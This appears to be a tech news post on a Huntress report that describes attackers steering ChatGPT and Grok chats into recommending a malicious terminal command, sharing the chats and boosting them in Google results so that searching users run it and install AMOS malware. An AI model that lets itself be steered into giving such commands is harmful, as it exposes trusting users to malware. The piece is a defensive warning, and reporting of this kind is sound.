Hackers are manipulating AI like ChatGPT and Grok to trick users into installing malware via search results. Learn how these dangerous AI prompt attacks work.
I’ve been tracking the collision course 💥 between cutting-edge AI and old-school fraud since I first reported on the vulnerabilities of agentic browsers earlier this year. Now, a worrying new convergence has emerged: hackers are manipulating AI prompts ⌨️ to plant dangerous commands directly into Google search results 🔍. When unsuspecting users follow these instructions, they inadvertently hand over the keys 🔑 to their systems, allowing attackers to install malware ☣️.
#chatgpt
This warning 📢 comes from a recent report by the detection-and-response firm Huntress 🎯, which outlines a clever—and alarming—methodology. First, a threat actor engages an AI assistant 🤖 in a conversation about a mundane tech topic, tricking the AI into suggesting a specific code snippet 📜 be pasted into a computer’s terminal 🖥️. The hacker then makes this chat log public and pays to boost its visibility 🚀 on Google. Consequently, anyone searching for that specific term encounters these malicious instructions near the top of the first results page 🔝.
Huntress put both ChatGPT and Grok to the test 🧪 after tracing a Mac-specific 🍎 data exfiltration attack—known as AMOS—back to a simple Google search. In that instance, a user trying to “clear disk space on Mac” 🧹 clicked a sponsored ChatGPT link 🔗. Lacking the technical expertise to recognize the code as hostile, they executed the command. That single action allowed the attackers to deploy the AMOS malware 🐛. Huntress’s testers confirmed that both major chatbots could be manipulated to replicate this exact attack vector 🏹.
As Huntress notes, the “evil genius” 🧠 here lies in how effectively this method sidesteps the traditional red flags 🚩 we’ve been trained to spot. There is no file to download, no suspicious executable to install, and no obviously shady website to visit. The victim simply has to trust Google and ChatGPT—two platforms they likely use daily or hear about constantly. Because users are primed to trust these sources 🤝, their guard is down 🛡️. Disturbingly, even after Huntress published their findings, the link to the compromised ChatGPT conversation remained active ⏳ on Google for at least another half-day.
This development arrives at a tumultuous moment 🌪️ for both AI platforms. Grok is currently facing backlash for its sycophantic behavior toward Elon Musk, while OpenAI’s ChatGPT is fighting to keep pace with intensifying competition 🥊. While it remains unclear if this exploit extends to other chatbots, I strongly advise exercising extreme caution 🚨. Beyond standard cybersecurity hygiene 🧼, adopt a new rule: never paste code 🚫 into your command terminal or browser URL bar unless you are absolutely certain of what it does.